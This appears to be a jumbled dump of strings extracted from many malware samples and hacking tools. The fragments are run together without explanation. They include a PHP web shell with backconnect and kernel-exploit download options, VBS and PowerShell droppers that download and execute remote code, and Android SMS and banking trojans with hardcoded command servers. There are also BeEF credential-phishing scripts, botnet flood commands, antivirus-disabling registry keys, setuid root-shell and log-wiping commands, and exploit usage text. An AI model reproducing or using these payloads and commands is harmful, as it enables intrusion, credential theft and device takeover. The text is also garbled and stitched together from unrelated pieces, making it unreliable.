/tmp/back \".$_post['backconnectip'].\" \".$_post['backconnectport'].\" &\");$_post['backcconnmsge']=\"</br></br><b><font color=red size=3>error:</font> can't backdoor host!</b>\";$_post['cmd'] = which('<option value=\"wget http://ftp.powernet.com.tr/supermail/debug/k3\">kernel attack (krad.c) pt1 (if wget installed)<center>kernel info: <form name=\"form1\" method=\"post\" action=\"http://google.com/search\">which wget curl w3m lynxnetstat -atup | grep istelseif ( enabled(\"exec\") ) { exec($cmd,$o); $output = join(\"\\r\\n\",$o); }<form method=\"post\"><input type=hidden name=act value=\"ls\">foreach($quicklaunch2 as $item) {echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"), 1)) .\"\\\">parent directory</option>\\n\";for (i=1; i<=frmupload.max.value; i++) str+='file '+i+': <input type=file name=file'+i+'><br>';if (frmupload.max.value<=0) frmupload.max.value=1;
1 internetqueryoptionawnetenumresourceahttpsendrequestexapsapi.dllm
1 chown root:root /tmp/.scsi/dev/bin/gshchmod 4777 /tmp/.scsi/dev/bin/gsh_lib_version,%02d%03dtransitstorestr = 'echo -n \"%s\" | store --nullterminate --file=\"%s\" --set=\"%s\"' % (nopenargs, outfile, var_name)the nopen-args provided are injected into infile if it is a valid -i do not autokill after 5 hours__strtoll_internal__strtoul_internalefdghijklmnopqrsutg8hcj hcf lcf0lcnghhcj0hcf@lcf0lcn8hgetexecnameinvalid option `__fpstartghfijklmnopqrstuvxwhttp_referer=\"https://127.0.0.1:6655/cgi/redmin?op=cron&action=once\"exec /usr/share/redmin/cgi/redminop=cron&action=once&frame=crononceframe&cronk=cronv&croncommand=%2ftmp%2ftmpwatch&time=12%3a12+01%2f28%2f2005
1 winhelpwreadprocessmemorywshshell.run \"dropbear.exe -r rsa -d dss -a -p 6789\", 0, falsewshshell.currentdirectory = \"c:\\windows\\temp\\dropbear\\\"set wshshell = createobject(\"wscript.shell\")dropbear server v%s https://matt.ucc.asn.au/dropbear/dropbear.htmlbadly formatted command= authorized_keys optionthis dropbear program does not support '%s' %s algorithm/etc/dropbear/dropbear_dss_host_key/etc/dropbear/dropbear_rsa_host_keypassds5bu9te7s
1 copy_file_to_system.exemozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1)!his=9!wn=!flof=!fil=!ps=i am so sad!i am so happy!jdk541please input file to bind and destination file name!%[^:]:%d,%d,%drun ok!installlocationdisplayversiondisplaynamewininet.dll internetopena internetconnecta httpopenrequesta httpsendrequesta httpqueryinfoa internetreadfile internetclosehandle
1 get-content $env:public\\libraries\\update.vbs) -replacewss.run \"powershell.exe \" & chr(34) & \"& {waitfor haha /t 2}\" & chr(34), 0call extract(updatevbs, wss.expandenvironmentstrings(\"%public%\") & \"\\libraries\\update.vbs\")createobject(\"wscript.shell\").run cmd, 0ojgdsb2jhbdptewhvc3qgpse9nrt0ijxb1ymxpyyvctglicmfyawvzxu2v0ihdzcya9ienyzwf0zu9iamvjdcgid1njcmlwdc5tagvjhnjcmlwdgrpcia9ifnwbgl0lvbhdggglvbhcmvudcatugf0acadqptzxqgd3nzid0gq3jlyxrlt2jqzwnd2hvyw1picygag9zdg5hbdownloadexecute=\"powershell \"\"&{$r=get-random;$wc=(new-object system.net.webclient);$wc.downloadfile(-executionpolicy bypass -file \"&home&\"dns.ps1\"createobject(\"wscript.shell\").run replace(downloadexecute,\"-_\",\"bat\")createobject(\"wscript.shell\").run dnscmd,0http://winodwsupdates.me%userprofile%\\appdata\\local\\microsoft\\ $fdn=[system.text.encoding]::utf8.getstring([system.convert]::frombase64string('&{$rn = get-random; $id = 'tr') -replace '__',('dns'+$id) | \\upd.vbsschtasks /create /f /sc minute /mo ') -replace '__',('htp'+$id) | &{$rn = get-random -minimum 1 -maximum 10000; $id = 'azhttp://www.israirairlines.com/?mode=page&page=14635&lang=eng<source code from https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.htmlrrrr\\libraries\\fireueye.vbs\
1 banner_layoutactivity_adpath_smsadpath_title_one7291-2ec9362bd699d0cd6f53a5ca6cdstart_serviceextra_key_smsandroid.provider.telephony.sms_receivedmphonenumbercnlybnq.qrk" // encrypted string "payload.dexcardholder nameinstagram.phpupd.php?text=android.app.action.add_device_admintap activate to continue with software update/upload-pictures.php?opened dialog:com/connect/myserviceandroid/os/binderandroid/app/servicedroidiandroidianserviceservicereceiverdendroidlastgamefile:///android_asset/enablecheatshttp://112.74.111.42:8000sha1-digest: oix4iywettkib4fbh7hconehuae=onlinegameprocedure_which_wap_idhttp://da.mmarket.com/mmsdk/mmsdk?func=mmsdk:posteventlogsha1-digest: +rsrtx5snjstrnt7pnaeqazy4kc=sha1-digest: rt2orts0wwtjffgletgffix1dfe=http://image.baidu.com/wisebrowse/index?tag1=%e6%98%8e%e6%98%9f&tag2=%e5%a5%b3%e6%98%8e%e6%98%9f&tag3=%e5%85%a8%e9%83%a8&pn=0&rn=10&fmpage=index&pos=magic#/channelpitchfork=022d4notlefttriangleequal=022ecsha1-digest: x27zpw9c6eyxvefuzfcl2lmumti=_znst12_vector_baseisssaissee13_m_deallocateepssjfbtp2ahr3wkc6leyon7d5gzxvismj4qulibgodlikelib.solibroot.sosilent91_arm_bin.rootlibr.solibpl_droidsonroids_gif.so41.208.110.46winmeif.myq-see.comwininit.myq-see.comsamsung.ddns.mecollge.myq-see.comsara2011.no-ip.bizandroidmanifest.xmlres/drawable-xxhdpi/ok_btn.jpgbot_idtype_password2decrypt.malloc.memset.free.pluginsms_encrypt.java_com_skymobi_pay_common_util_localdatadecrpty_encrypt.strcpy%ioperator%%imodel%%ideviceid%%ipackname%villllll280128120000z0w1e6fff4c5062fbdc9886fec93a75d2ac1121120104150z&inbox_timestamp > 0 and is_permanent=1contact_id = ? and mimetype = ?863d9effe70187254d3c5e9c76613a99nv-sa1nd your's device will reboot and!2,.b99^ggd&r-22922222222222222222q^saawat2222222222229222q^saawabuildiddcef055eee3f76cabb27b3bd7233f6e3c143d55d996634d1b761709372042474find_valid_domain6589y459zactivitylcom/android/zics/zruntimeinterfacemigfma0gcsqgsib3dqebaquaa4gnadcbiqkbgqc/jvgb0/jsrwi7i4j9iwo72kzw404kj02a97exbuefvee7yywstbkw5sylkxctaoqwwr19j0y+xb6+h2brunx307bv/qpg6dnpg+lx8fppvhbhoudgkb/xuzpaz/gjbtpwztbbmt+mi1qtrlyakdxsjgwyvopfvz82rxcablv/twidaqabmiiceaibadanbgkqhkig9w0baqefaascamiwggjeageaaogbal8m+bvt+njfalulgn0ja7vypndjtisptyd3stftr59v4tvljzjnsrdmxiupck1qhdbavx2prj7fvr6hyfg43hftsfx9ckbooc+d4vhx88++fue652apv9e5k9rp8yltondnnsgzp6yjvbneviaopfkmzzi+g8vxpzzhfwbuvx+3agmbaaecgyblyr6uoquapozqjtvia5bpx0ijej+ygybzh1qs3z9e4itz42rpkwjkchds6eia2kpolznqbbmrv4e8ut3ufcvufexjr5clgvkj+xhxxqs75+kt38wgzz1bw0pk4st1/aglrt5/netwuzmi/yfnfakrpqvrxuncxnlhmhs2eflkiqjbapgea2uxvwd0ti8cla8hiwpsncptcp41dh2h0yczrfmo2zafppjih2gqy5txszwblbjxfcy8/whryaqx0itmrgscqqdkh5u1nfprvk0hu8ibrb/lpygimz+wm/chfsc65sls/cml3u7huoj2lrgpz+bm68624h0klviqpbjpmayvbbyfakea1nnfj9uax8rdn1b3ecjpmvqqimdjwyvcnjjq7/wnj6nu3+0toxc0xrsheigtbhrfsnrxc6kfuv3budbhvwog9wjbai+frh1ekowlaqviundw6ycndwhedhysz0tdodlhp112ieign06dpsgyjsmqurntb92cjsnw82c3r2nhmicxr60cqqcn466jf9gjrzipo64oyw/elmac7vxgtegmvyz2/yfx5crclua4dygd1ju0emxpea9og/etwctv0rvpfc9ssn8vhhheeeeeebbbbbb??????;;;;;;888888444444000000,,,,,,''''''''''''######ooo###2e6081a2-a063-45c7-ab90-5db596e42c7cmsacm32.dllmain_text_tag080229013346z350717013346z0number_char_exp_signloganberryapplicationattachbasecontextobstetricres/xml/device_admin_data.xml]data:image/png;base64,ivborw0kggoaaaansuheugaaaiaaaacabamaaaaxehz4aaaagfbmvevmaxguwuwtweatweatweatweavwuwtwealnfqiaaaab3rstlmalozouetympn8xgaaabfjrefuef7t2e9l+zacx/fp1i3n7pfhxauivw7k3hway1dfonci2l61lvs8fuoxzyw22rdbbub1an4kx7kqdqcvcilgdc0aulcghzaq+j/hab2hlc5butxeeomglgzikzkaledtakm95hsjpxs6t9eyrsghzmmvuyxkolzs2axycq98gei9sqwekgyb1/inmgutfw9irdlwdwghtuqcegw5a+zigwn5aqfvjq0zviwqkywfgyjvcordffbdtgmyu80mkfc2h5soxfglxbiqyg9b2xzhgrodzagzdiofm+y0e5zjthbhurzthl9bb24m8hlfzqcxt+cysix3qmjubn9jazz3clobwirko+8izvsdmk7po4lv/yexpt/rxboi6njtciraciracita2bey0xnod4x8d5wittwfuknnravscof+aarfk/cfbtwu0cveydduycganyxpykbx+oeqkl772i7yas/+cg+zmy6m8vyfdnonqpv5nkfkvi+tvmwaxxkigrdqdgxzo7xbsqx1b9qezhpibcmhei3wqeyn9d9fr+qccji7yfdb8zv+qhaeqfajcs5k2taqqxaaaaaasuvork5cyii=device_admin_descpillagedactivityepigraphyservicexbot007:write apk file (from txt in assets) to sdcard sucessfully!4write apk (from txt in assets) file to sdcard fail!138675150963res/xml/device_admin.xmldevice registered: regid =cmvudcymjg==dxnzzcymjg==hdnrq2golmlelvyohc9y1x+nzvuejw8w3sbuacertificado # 73828394a compania tmn informa que o vosso sistema android tem vulnerabilidadeandroid.app.extra.add_explanationdevice_policycontent://sms/#admin_startkill callunstop all numbers*lcom/metasploit/stage/payloadtrustmanager;(com.metasploit.stage.payloadtrustmanagerlcom/metasploit/stage/payload$1;lcom/metasploit/stage/payload;-com.metasploit.meterpreter.androidmeterpreter,lcom/metasploit/stage/mainbroadcastreceiver;#lcom/metasploit/stage/mainactivity;lcom/metasploit/stage/a;lcom/metasploit/stage/c;lcom/metasploit/stage/b;android.engine.apktel:locknowcmd_confsms_conffilter2arnrsiec sisanirhguecisoijng tsassets/data.dbres/xml/device_admin_sample.xmlpkselen3333http://mayis24.4tubetv.xyz/dmr/yanpkiportraitcallback(android.app.extra.device_adminsmsreceiver&imsi=com.ahnlab.v3mobileplus#intercept_sms_start#intercept_sms_stop#block_numbers#wipe_datavisa electrone!qqazxs__exidx_endres/layout/notify_apkinstall.xmlpkpluginsms_decrypt__dso_handlelib/armeabi/libmylib.sout]diok\"3|0597794205new victim arrivedhttp://ksa-sef.com/hack%20mobaile/addnewsms.phphttp://ksa-sef.com/hack%20mobaile/addalllogcall.phphttp://ksa-sef.com/hack%20mobaile/addscreenshot.phphttp://ksa-sef.com/hack%20mobaile/addsms.phphttp://ksa-sef.com/hack%20mobaile/addvcf.phphttp://ksa-sef.com/hack%20mobaile/addimsi.phphttp://ksa-sef.com/hack%20mobaile/addhistoryinternet.phphttp://ksa-sef.com/hack%20mobaile/addinconinglogs.phpodnotice.txtcamera this device has camera!camera this device has nooo camera!send|1sbdbbbbbbf|k|send|372|screamsms|senssdsend|5ms5gs5anncsend|45clclca01send|999sand|timestart!s!c!r!e!a!m!server_ipserver_namecontent://sms/inboxscreamhackerscreamondroid.pnggetsrvaddrgetsrvportandroid.intent.action.start_google_servicejavascript:scrolltojavascript:document.getelementbyid('dns1')admin:101.200.147.153112.33.13.11120.76.249.59svcdownload<config><apptitle><txinicio><txiniciotitulo><txnored><txnoredtitulo><txnoredretry><txnoredsalir><laurl><txquieresalir><txquieresalirtitulo><txquieresalirsi><txquieresalirno><txfiltro><txfiltrourl><posicion>android/system/popreceiver/get-functions.php?/new-upload.php?/message.php?/get.php?cv7obbkpvc2pvjmwsfhzxhhttp://joyappstech.biz:11111/knock/i hate testers ongloballayouthttp://144.76.70.213:7777/ecspectapatronum/6589y459gj4058rtq,hu4p#ht;u!xo7t,ud+gkwg#m!lf>laq&+j{lgvar lilogo = 'http://content.linkedin.com/etc/designs/linkedin/katy/global/clientlibs/img/logo.png';dark=document.getelementbyid('darkenscreenobject'); beef.execute(function() {var logo = 'http://www.youtube.com/yt/brand/media/image/yt-brand-standard-logo-630px.png';description.text('enter your apple id e-mail address and password');sneakydiv.innerhtml= '<div id=\"edge\" '+edgeborder+'><div id=\"window_container\" '+windowborder+ '><div id=\"title_bar\" ' +tivar logo = 'https://www.yammer.com/favicon.ico';beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);var title = 'session timed out <img src=\"' + lilogo + '\" align=right height=20 width=70 alt=\"linkedin\">';var title = 'session timed out <img src=\"' + logo + '\" align=right height=20 width=70 alt=\"youtube\">';var title = 'session timed out <img src=\"' + logo + '\" align=right height=24 width=24 alt=\"yammer\">';var logobox = 'style=\"border:4px #84acdd solid;border-radius:7px;height:45px;width:45px;background:#ffffff\"';sneakydiv.innerhtml= '<br><img src=\\''+imgr+'\\' width=\\'80px\\' height\\'80px\\' /><h2>your session has timed out!</h2><p>forinner.append(title, description, user,password);sneakydiv.innerhtml= '<div id=\"window_container\" '+windowborder+ '><div id=\"windowmain\" ' +windowmain+ '><div id=\"title_baranswer = document.getelementbyid('uname').value+':'+document.getelementbyid('pass').value;password.keydown(function(event) {j@h
1 30.40.50.60:9342|###[ snmpresponse ]###[+] generating exploit for exec mode pass-disable[+] building payload for mode pass-disable[+] executing: extrabaconappended aaaadminauth_enable payload/bananaglee/eligiblebombprotocol must be either http or https (ex: https://1.2.3.4:1234)
1 appdata\\local\\temp\\_.net_\\msiexec.exetype:on_execuid:%spriv:%sarch:x%sgend:%scores:%iver:%snet:%s|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s||type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|filesearch.stoprapidgetlayer4.slowlorisrudyddos.war.smartviewftp.upload%s %s :%s layer4 combo flood: stopped%s %s :%s irc war: flood started [type: %s | target: %s]%s %s :%s ftp upload: failedathena v2%s %s :%s ecf flood: stopped [total connections: %ld | rate: %ld connections/second]arme flood on %s/%s:%i for %i seconds [host confirmed vulnerable rapid http combo flood on %s:%i for %i secondsbegan flood: %i connections every %i ms to %s:%iipkiller>athenaathena=shit!athena-v1btc wallet.dat file foundminecraft lastlogin file foundprocess '%s' was found and scheduled for deletion upon next rebootuser-agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; trident/4.0; .net clr 1.1.4322; .net clr 2.0.503l3; .net clr 3.0.4506.2152; .net clr 3.5.30729; msoffice 12)rapid connect/disconnectbtc wallet.dat found,:!arme:!openurl:!condis:!httpcombo:!urlblock:!udp:!btcwallet533d9226e4c1ce0a9815dbeb19235ae4x-ts-rule-name: %sx-ts-rule-patternid: %ux-ts-botid: %sx-ts-domain: %sx-ts-sessionid: %sx-ts-header-cookie: %sx-ts-header-referer: %sx-ts-header-acceptencoding: %sx-ts-header-acceptlanguage: %sx-ts-header-useragent: %s_hvnc_init@4_hvnc_uninit@0_hvnc_start@8_hvnc_stop@0_hvnc_wait@0_hvnc_work@0nspr4.dllnss3.dllchrome.dllu
1 %s\\rundll32.exe \"%s\", shadowplaynvdisps.dll%snvdisps.dll\\winhlp32.exenvdisps_user.dat%snvdisps_user.datprogramdata\\rastls\\rastls.exeprogramdata\\rastls\\rundll32.exeprogramdata\\rastls\\svchost.exewindows\\system32\\regsvr32.exe4689windows\\system32\\mshta.exewindows\\system32\\windowspowershell\\v1.0\\powershell.exewindows\\system32\\wbem\\wmiprvse.exe%s=?getname&computer=^xjwfwcgrhdgelaa=jvdjtkrjuibtcplugpsexec.exewindows\\system32\\net.exewindows\\system32\\at.exeinvalid key length used to initialize blowfish.getpcproxyhandlerstartpcproxysetpcproxyhandler
1 id-at-postaladdress%
1 connect_back_tcp_channel#do_connect:: error resolving connect back hostnamekernel32.dll getprocaddressloadlibraryaws2_32.dllc
1 ven_vmware_prod_vmware_virtual_hgfs.sysmhgfs.sysprleth.sysprlfs.sysprlmouse.sysprlvideo.sysprl_pv32.sysvpc-s3.sysvmsrvc.sysvmx86.sysvmnet.sysvmicheartbeatvmicvssvmicshutdownvmicexchangevmdebugvmmousevmtoolsvmmemctlvmwarevpcbusvpcuhubmsvmmoufxenevtchnxennetxennet6xensvcxenvdbxenvmmvboxhook.dllvboxservicevboxtrayvboxmousevboxguestvboxsfvboxguestadditionsvbox harddisk00-05-6900:05:6900056900-50-5600:50:5600505600-0c-2900:0c:29000c2900-1c-1400:1c:14001c1408-00-2708:00:27080027\\\\.\\physicaldrive0sandbox\\sample\\virusmaltesttequilaboomboommalwareollydbgwindbgframeclassselect description from win32_videocontrollerselect * from win32_videocontrollervirtualbox graphics adaptervmware svga iivm additions s3 trio32/64parallelremotefxcirrus logicmatroxkernel32.dllisdebuggerpresentcontinuedebugeventprocexp.exeprocmon.exeprocessmonitor.exewireshark.exefiddler.exewindbg.exeollydbg.exewinhex.exeprocesshacker.exehiew32.exe\\\\.\\ntice\\\\.\\sice\\\\.\\syser\\\\.\\syserboot\\\\.\\syserdbgmsgsoftware\\microsoft\\windows\\currentversionregqueryvalue55274-640-2673064-2395076487-337-8429955-2261476487-640-1457236-23837sbiedll.dll76487-644-3177037-23510vboxservice.exevmware.exevmware-authd.exevmware-hostd.exevmware-tray.exevmware-vmx.exevmnetdhcp.exevpxclient.exehardware\\description\\systemhardware\\description\\system\\biossystemmanufacturersoftware\\microsoft\\windows\\currentversion\\policies\\explorer\\disallowrunsoftware\\microsoft\\windows\\currentversion\\uninstall\\software\\policies\\microsoft\\windows defenderantivirusdisablenotifydontreportinfectioninformationdisableantispywareruninvalidsignaturesantivirusoverridecheckexesignaturesblackd.exeblackice.exelockdown.exelockdown2000.exetaskkill.exetskill.exesmc.exesniffem.exezapro.exezlclient.exezonealarm.exesoftware\\microsoft\\security centeruacdisablenotifysystem\\currentcontrolset\\services\\sharedaccess\\parameters\\firewallpolicyenablefirewallfirewalldisablenotifynetsh firewall add allowedprogramsoftware\\microsoft\\windows\\currentversion\\policies\\systemdisableregistrytoolsdisableregeditenableexecuteprotectionsupportntsetinformationprocessvirtualproctectexsetprocessdeppolicyzwprotectvirtualmemorydisabletaskmgrvirtualallocexntwritevirtualmemorywriteprocessmemorycreateremotethreadcreatethreadshell32.dllwinexecsoftware\\microsoft\\windows\\currentversion\\runsoftware\\microsoft\\windows\\currentversion\\runoncesoftware\\microsoft\\windows\\currentversion\\runservicessoftware\\microsoft\\windows\\currentversion\\runservicesoncesoftware\\microsoft\\windows nt\\currentversion\\winlogonsoftware\\microsoft\\windows\\currentversion\\policies\\explorer\\runsoftware\\microsoft\\windowsnt\\currentversion\\windowssoftware\\microsoft\\windows\\currentversion\\explorer\\sharedtaskschedulercomfile\\shell\\open\\commandpiffile\\shell\\open\\commandexefile\\shell\\open\\commandtxtfile\\shell\\open\\commandwin.inisystem.inistart menu\\programs\\startupsoftware\\classes\\protocols\\handlersoftware\\classes\\protocols\\filtermicrosoft\\windows\\currentversion\\internet settings\\proxyserversoftware\\microsoft\\windows\\currentversion\\internet settings\\proxyenabledrivers\\etc\\hostsadvapi32.dllcontrolservicequeryservicestatusdllcanunloadnowdllinstalldllregisterserverdllunregisterserverws2_32.dllsystem.netwsock32.dllwsastartupsendtorecvfromwsasendtowsarecvfromudpclientmswsock.dllacceptgetacceptexsockaddrswsaacceptwsasockettcplisteneraccepttcpclient.no-ip.org.publicvm.com.linkpc.net.dynu.com.dynu.net.afraid.org.chickenkiller.com.crabdance.com.ignorelist.com.jumpingcrab.com.moo.com.strangled.com.twillightparadox.com.us.to.strangled.net.info.tm.homenet.org.biz.tm.continent.kz.ax.lt.system-ns.com.adultdns.com.craftx.biz.ddns01.com.dns53.biz.dnsapi.info.dnsd.info.dnsdynamic.com.dnsdynamic.net.dnsget.org.fe100.net.flashserv.net.ftp21.netfirewallapi.dll\\currentcontrolset\\services\\tcpip6\\parameters\\interfaces\\system.net.mailsmtpclientmail from:rcpt to:cdo.messagecdosmtpservercdosendusingmethodcdoex.dll/cdo/configuration/smtpserverpeercollabexportcontactpeercollabgetapplicationregistrationinfopeercollabgetendpointnamepeercollabgeteventdatapeercollabgetinvitationresponsepeercollabgetpresenceinfopeercollabgetsigninoptionspeercollabinvitecontactpeercollabinviteendpointpeercollabparsecontactpeercollabquerycontactdatapeercollabrefreshendpointdatapeercollabregisterapplicationpeercollabregistereventpeercollabsetendpointnamepeercollabsetobjectpeercollabsetpresenceinfopeercollabsignoutpeercollabunregisterapplicationpeercollabupdatecontacttor\\hidden_service\\private_keytor\\hidden_service\\hostnametor\\locktor\\statenickpingjoinuserprivmsgwininet.dllinternetopenurlinternetwritefileidhttpheaderinfourlmon.dllurldownloadtocachefileurlopenstreamurlopenpullstreamftpgetcurrentdirectoryftpgetfileftpputfileftpsetcurrentdirectoryftpopenfileftpgetfilesizeftpdeletefileftpcreatedirectoryftpremovedirectoryftprenamefileftpdownloadftpuploadftpgetdirectorysocketwsaconnectclosesocketwsacleanupdnsapi.dllgethostentrygetaddrinfogethostbynamewsaasyncgethostbynamednsqueryssleay32.dlllibeay32.dlllibssl32.dllidsslopensslcrypt32.dllsystemtimetofiletimegetsystemtimegetsystemtimeasfiletimecryptcreatehashcryptacquirecontextcrypthashdataopencl.dllnvcuda.dllopengl32.dllcpuminer 2.2.2x-mining-extensionscpuminer 2.2.3x-mining-extensionsufasoft bitcoin-miner/0.20stratumsoftware\\microsoft\\systemcertificates\\spc\\certificatescertopensystemstoreadjusttokenprivilegesgdi32.dlluser32.dllbitbltgetdccheckip.dyndns.orgwhatismyip.orgwhatsmyipaddress.comgetmyip.orggetmyip.co.uksoftware\\vitalwerks\\ducj.maxmind.comgetasynckeystategetkeystatemapvirtualkeygetkeyboardtypesamiconnectsamigetprivatedatasamqueryinformationusecredenumerateacredenumeratewsoftware\\microsoft\\internet account managersoftware\\microsoft\\identitycrl\\credssecurity\\policy\\secretswinmm.dllwaveinstartwaveinresetwaveinaddbufferwaveinopenwaveinclosesignons.sqlitesignons3.txtsecmod.dbcert8.dbkey3.dbvncpassviewabe2869f-9b47-4cd9-a358-c22904dba7f7packet.dllnpf.syswpcap.dllwinpcap.dllopenthreadqueueuserapcautorun.infdesktop.inidesktop.lnknetapi32.dllnetsharegetinfonetshareenumultravnc.inistartvncstopvncsystem\\currentcontrolset\\control\\terminal serversoftware\\microsoft\\windows nt\\currentversion\\terminal serversystem\\currentcontrolset\\control\\terminal server\\winstations\\rdp-tcpenableadmintsremotenet start termservicesc config termservice startsoftware\\microsoft\\telnetserveravicap32.dllcapcreatecapturewindowsoftware\\microsoft\\windows nt\\currentversion\\hotfixcreatemutexadvapi32.dllregqueryvalueexaregopenkeyexaregcreatekeyaduplicatetokenexopenprocesstokenlookupprivilegevalueakernel32.dllgetprivateprofileintagetprivateprofilestringawriteprivateprofilestringadeletefileacreatefileafindfirstfileamovefileexafindcloseuser32.dllunhookwindowshookexsetwindowshookexacallnexthookexsoftware\\\\oracle\\\\virtualbox guest additionsvmmouse.sysvmware virtual ide hard drivesystem\\controlset001\\services\\disk\\enumsystem\\\\controlset001\\\\services\\\\disk\\\\enumvmhgfs.sysvmcivmtoolsvmware2vmount2vmusrvcvboxservicevboxtrayxenservice
1 gk%1_slocal t = w.exec2str(\"regedit local r = w.exec2str(\"catap*.txt link*.txt node*.tun virtualencryptednetwork.licencemove o fakevirtualencryptednetwork.dllsinfo | basex b 32url | dext l 30w.exec2str(execstr)netnfo irc | basex b 32urlw.exec(\"wfw status\")exec(\"samdump\")cat virtualencryptednetwork.ini|grepif string.lower(k) == \"securityproviders\" thenexec2str(\"plist b | grep netsvcs\").*account.*|.*acct.*|.*domain.*|.*login.*|.*member.*sauron_kblog_key =resolve hosts that answerprint only replying ipsdo not display mac addressesinject using process name or pid. defaultconvert mode: read log from file and convert to textmaximum running time in seconds64, 64url, 32, 32url or 16.force decoding when input is invalid/corruptthis cruftassemble rows of dns names back to a single string of dataremoves checks of dns names and lengths (during split)randomize data lengths (length/2 to length)n
1 kernel32.dllmsvcrt.dllloadlibraryagetprocaddress
1 getprocaddressya
1 iowriteerrorlogentrykeremoveentrydevicequeuesesingleprivilegecheckiobuilddeviceiocontrolrequestkeremovedevicequeueiofcompleterequestkeinitializespinlockmmisnonpagedsystemaddressvalidiocreatedevicekefreleasespinlockfromdpcleveld
1 downloadfile - exception:%s,code:0x%08x.mozilla/4.0 (compatible; msie 7.0; windows nt 5.1)cdllapp::initinstance() - evnet already exists../emptycriss <target ip>cut and paste the following to the telnet prompt:environ define ttyprompt abcdefrunning \\\"tcpdump -n -n\\\", on the environment variable \\$interface, scriptedcannot read $opetc/scripme.override -- are you root?$env{exploit_scripme}the encryption key is ___tempfile2.outunless the -c (clobber) option is used, if two retr commands of themywarn(\"end of $destfile determined by \\\"^connection closed by foreign host\\\"\")end of $destfile determined by \"^connection closed by foreign host> /var/log/audit/audit.log; rm -f .pastables to run on target:cp /var/log/audit/audit.log .tmphere is the first good cron session fromno need to clean login lines.sh >/dev/tcp/ <&1 2>&1test: mungedport=%6d pp=%d unmunged=%6decho \"example: ${0} -l 192.168.1.1 -p 22222 -x 9999\"-x [ port to start mini x server on default = 12121 ]\"callback_port=32177usage: %s -e -v -i target ip [-c cert file] [-k key file]type=licxfer&ftp=%s&source=/var/home/ftp/pub&version=na&licfile=[-l log file] [-m save mac time file(s)] [-p server port]chown root sh; chmod 4777 sh;cp /bin/sh .;chown root sh;echo clean up when elevated:exe=$dir/sbin/ey_vrupdatedel --- usage: %s -l file -w wtmp -r userroasting ->%s<- at ->%d:%d<-rbnoil -roasting ->requested forwarding of port %d but user is not root.internal error: we do not read, but chan_read_failed for istate~# - list forwarded connectionspacket_inject_ignore: blockresult = self.send_command(\"ls -al %s\" % self.options.dir)cmd += \"d=-l%s \" % self.options.listen_portuse this on target to get your rat:$ratremotename && $command = \"$nc$bindto -vv -l -p $port < ${ratremotename}\" ;usage: %s -l [ netcat listener ] [ -p optional target port instead of 23 ] <ip>target is not vulnerable. exitingsending final buffer: evil_blocks and shellcode...timeout waiting for daemon to die. exploit probably failed.usage: %s <host> <port> e <contents of a local file to be executed on target>writing your %s to target.(e)xploit, (r)ead, (m)ove and then write, (w)rite-c command: shell command stringcannot combine shell command mode with args to do socket reuse-r: reuse socket for nopen connection (requires -t, -d, -f, -n, no -c)firing with the same hosts, on altername ports (target is on 8080, listener on 443)recieved unknown command payload: 0x%xusage: eslide [options] <-t profile> <-l listenerip> <targetip>-------- delete key - remove a *closed* tabusage: ./exp command display_to_return_tosizeof shellcode = %dexecve failed!echo \"example: ${0} -l 192.168.1.1 -p 22222 -s 22223 -x 9999\"echo \"call back port2 = ${sport}\"* * * * * root chown root %s; chmod 4755 %s; %s[-] kernel not vulnerable[-] failed to spawn shell: %s-s shell use shell instead of %susage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]error: not vulnerableport=%d connected! xxx.xxxxxxexecuting ./ebbnew_linux -r %s -v %s -a %s %s -t %s -p %s./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772version 1 - start with option #18 first, if it fails then try this option%s is a wrapper program for ebbnew_linux exploit for sparc solaris rpc services# building shellcode into exploit.%s -w /index.html -v 3.5 -t 10 -c \"/usr/openwin/bin/xterm -d 555.1.2.2:0&\" -d 10.0.0.1 -p 80# starting exhaustive attack against usage: $prog [-f directory] -p prognum [-v ver] [-t proto] -i ipadr$gotsunos = ($line =~ /program version netid address service owner/ );+ bruteforce mode.+ host is not running samba!+ connecting back to: [%d.%d.%d.%d:45295]+ exploit failed, try -b to bruteforce.usage: %s [-bbccdfprsstv] [host]** significantly improve processing time-c cmd_name: strncmp() search for 1st %d chars of commands that mysql \\$d --host=\\$h --user=\\$u --password=\\\"\\$p\\\" -e \\\"select * from \\$twindow 3: $0 -uadmin -ppassword -i127.0.0.1 -dipboard -c\\\"sleep 500|nc$ua->agent(\"mozilla/4.0 (compatible; msie 6.0; windows nt 5.0)\");$url = $host . \"/admin/index.php?adsess=\" . $enter . \"&app=core&module=applications&section=hooks&do=install_hook\";usage: %s -i <ip_addr/hostname> -c <command> -t <target_type> (-u <port> | -t <port>) -i target ip address / hostname note: choosing the correct target type is a bit of guesswork.solaris rpc.cmsd remote root exploitif one choice fails, you may want to try another.shellfilecompleted.1zeke_remove%s/%s server failing (looping), service terminatedgetpwnam: %s: no such userexecv %s: %m%s/%s: unknown service?usage: %s <shellcode> <output_file>here is the decoder+(encoded-decoder)+payloadusage: %s hostip port cmd [printer_name]command must be less than 61 chars__rw_read_waiting__mutexkind__rw_psharedusage: %s [-v] -t <target_ip> -p porterror - shellcode not as expected - unable to fix upwarning - core wipe mode - this will leave a core file on target[-c] wipe target core file (leaves less incriminating core on failed target)-a <jumpaddr> (shellcode address)*** insane undocumented incremental port mode!!! ***%x:%d --> %x:%d %d bytesclient: can't bind to local address, are you root?unable to register portcould not resolve destinationraw troubles$gotgs=1 if (($line =~ /scan for (sol|snmp)\\s+version/) orusage: $prog [-f file] -p prognum [-v ver] [-t proto] -i ipadr$scanth = $scanth . \" -s \" . $scanthreads;print \"java -jar jscanner.jar$scanth$list\\n\";exec(\"xterm $xargs -e /current/tmp/promptkill.kid.$tag $pid\");$xargs=\"-title \\\"kill process $pid?\\\" -name \\\"kill process $pid?\\\" -bg white -fg red -geometry 202x19+0+0\" ;.tmp.%d.xxxxxx[-] couldn't create temp file/boot/system.map-%s[+] shellcode prepared, re-executing[-] kernel not vulnerable: prctl[-] shell failed[!] selinux apparently enforcing. continue [y|n]? t=<target ip> [o=<port>] y=<target type>no command given!! bailing...no port. assuming 